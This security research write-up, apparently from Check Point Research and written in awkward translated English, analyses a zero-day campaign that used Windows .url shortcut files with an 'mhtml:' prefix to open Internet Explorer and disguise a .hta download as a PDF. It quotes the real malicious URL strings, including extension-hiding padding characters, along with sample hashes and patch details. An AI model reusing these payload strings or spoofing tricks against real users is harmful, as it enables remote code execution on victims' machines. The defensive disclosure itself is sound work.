by Haifei Li
Introduction and background
Check Point Research recently discovered that hackers were using new (or previously unknown) tricks to trick Windows users into executing remote code. Specifically, the hackers used special Windows Internet shortcut files (.url extension) that, when clicked, called Internet Explorer (IE) to visit the URL controlled by the hacker. Another trick on IE is to hide the malicious .hta extension. By opening the URL with IE instead of the modern and much more secure Chrome/Edge browser on Windows, the hacker gained significant advantages in exploiting the victim’s computer, despite the computer running the modern Windows 10/11 operating system.
As a reminder, it is not uncommon for malicious actors to use .url files as the initial attack vector in their campaigns. The use of new or zero-day vulnerabilities related to .url files has happened before. CVE-2023-36025, which was just patched last November, is a good example.
The malicious URL samples we discovered could date back to January 2023 (over a year ago) or at the latest to May 13, 2024 (a few days ago, at the time of writing). This suggests that malicious actors have been using these attack techniques for some time now.
Resurrect Internet Explorer with the “mhtml” trick
Let’s use the last .url example on Virus Total as an example to explain the technique.
The content of the sample:
As we can see, the last few lines of strings in the .url file point to a custom icon in the Microsoft Edge application file msedge.exeThis would appear to point to a PDF file (but in fact it is not).
It is important to note that, as we can see, the value of the URL The keyword is quite different from usual keywords – typically, for common .url files, the URL the parameter would look like URL=https://www.google.com which points to the URL https://www.google.com. But in this example the value is:
mhtml:http://cbmelipilla.cl/te/test1.html!x-usc:http://cbmelipilla.cl/te/test1.html
It uses a special prefix mhtml: and also a !x-usc: between.
A few years ago, we saw the same trick (which we call the “mhtml” trick) used in the infamous CVE-2021-40444 zero-day attacks, where the file document.xml.rels contains exactly the same string.
We know that the “mhtml” trick has already been used in Word documents when exploiting CVE-2021-40444, and now we see the same trick being used in the .url file. So what could attackers accomplish using this? Let’s do some testing.
If we rename the sample as Books_A0UJKO.pdf.url (the name in the wild), the .url file will look like the following on Windows 11 (fully fixed) – appears as a link to a PDF file.
If we act as the victim (we want to open the PDF), we double-click on the Shortcut file. The victim will then get this:
See what’s weird? Internet Explorer is open. In fact, with some debugging skills, we were able to confirm that IE was indeed used to open the link. http://cbmelipilla(.)cl/te/test1.htmlwhich is specified in the .url file.
As we know, Microsoft announced the end of IE a few years ago. On classic Windows 10/11, users’ normal actions should not open IE to visit websites because it does not have the same level of security as modern browsers. IE is an outdated web browser and was well-known for its lack of security. This is one of the main reasons why Microsoft replaced it with the modern and more secure Microsoft Edge, or users simply install and use Google’s Chrome browser.
Warning: Even though IE has been declared “retired and out of support,” technically speaking, IE is still part of the Windows operating system and is “not inherently dangerous, as IE is still supported for security vulnerabilities, and there should be no known exploitable security vulnerabilities,” according to our communications with Microsoft.
So, by default, users should not open websites with IE unless they specifically and knowingly request it.
However, in this example, with the “mhtml” trick, when the victim opens the .url shortcut (the victim thinks they are opening a PDF), the attacker-controlled website opens with IE, rather than the regular Chrome/Edge.
From there (with the website being opened with IE), the attacker could do many bad things because IE is insecure and outdated. For example, if the attacker has an IE zero-day exploit – which is much easier to find than Chrome/Edge – the attacker could attack the victim to immediately gain RCE. However, in the samples we analyzed, the threat actors did not use any IE RCE exploit. Instead, they used another trick in IE – which was probably not publicly known before – to our knowledge – to trick the victim into gaining RCE.
Extra tip for IE: hide the .hta extension name
Let’s revisit the previous figure again (highlighted below). According to the promoted dialog (IE), it appears to be asking the user to open a PDF file named Books_A0UJKO.pdf.
But is that the case here? Do you think you’re opening a PDF?
Not really. If we click “Open” (the default option) in the IE dialog above, we’ll get another promoted dialog (see below). This is due to IE’s Protected Mode (a relatively weaker browser sandbox).
If the victim continues to ignore the warning (because they think they are opening a PDF), their computer will eventually be hacked: the “opened” file is actually a malicious .hta file being downloaded and executed.
If we look closely at the HTTP traffic, we will find that there are many non-printable characters added to the end of the Books_A0UJKO.pdf chain. Finally, there is the .hta chain: this is the real (and dangerous) name of the extension.
This is exactly why the IE dialog box didn’t show the .hta file name to the user. The actual full URL is:
https://cbmelipilla.cl/te/Books_A0UJKO.pdf%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80.hta
With this trick, the attacker could successfully trick the victim into continuing their actions while in fact the victim downloads and runs a dangerous .hta application.
bd710ee53ef3ad872f3f0678117050608a8e073c87045a06a86fb4a7f0e4eff0 b16aee58b7dfaf2a612144e2c993e29dcbd59d8c20e0fd0ab75b76dd9170e104 65142c8f490839a60f4907ab8f28dd9db4258e1cfab2d48e89437ef2188a6e94 bfd59ed369057c325e517b22be505f42d60916a47e8bdcbe690210a3087d466d 22e2d84c2a9525e8c6a825fb53f2f30621c5e6c68b1051432b1c5c625ae46f8c c9f58d96ec809a75679ec3c7a61eaaf3adbbeb6613d667257517bdc41ecca9ae
Defense and Mitigation
We have confirmed that the mentioned exploit tricks, which have been actively used for at least a year, work on the latest Windows 10/11 operating systems.
Check Point released the following protections on IPS and Harmony Email, the IPS signature named “Internet Shortcut File Remote Code Execution” to our customers months before this release, to protect against this zero-day attack.
Email and collaboration in harmony provides complete online protection against this zero-day attack at the highest security level.
We reported our findings to the Microsoft Security Response Center (MSRC) on Thursday, May 16, 2024. Since then, both parties have worked closely on this issue, resulting in an official Microsoft patch (CVE-2024-38112) released on July 9. Windows users are strongly encouraged to apply the patch as soon as possible.
For concerned Windows users, we recommend being especially vigilant about .url files sent from untrusted sources. As we have seen, this type of attack requires some warning (user interaction) to be successful.
Check Point Research continues to monitor activity related to this type of attack around the world.
Conclusion
To summarize the attacks from an exploitation perspective: The first technique used in these campaigns is the “mhtml” trick, which allows the attacker to call IE instead of the more secure Chrome/Edge browser. The second technique is an IE trick to trick the victim into thinking they are opening a PDF file, when in fact they are downloading and executing a dangerous file. .hta. The general goal of these attacks is to trick victims into thinking they are opening a PDF file, and this is achieved through these two tricks.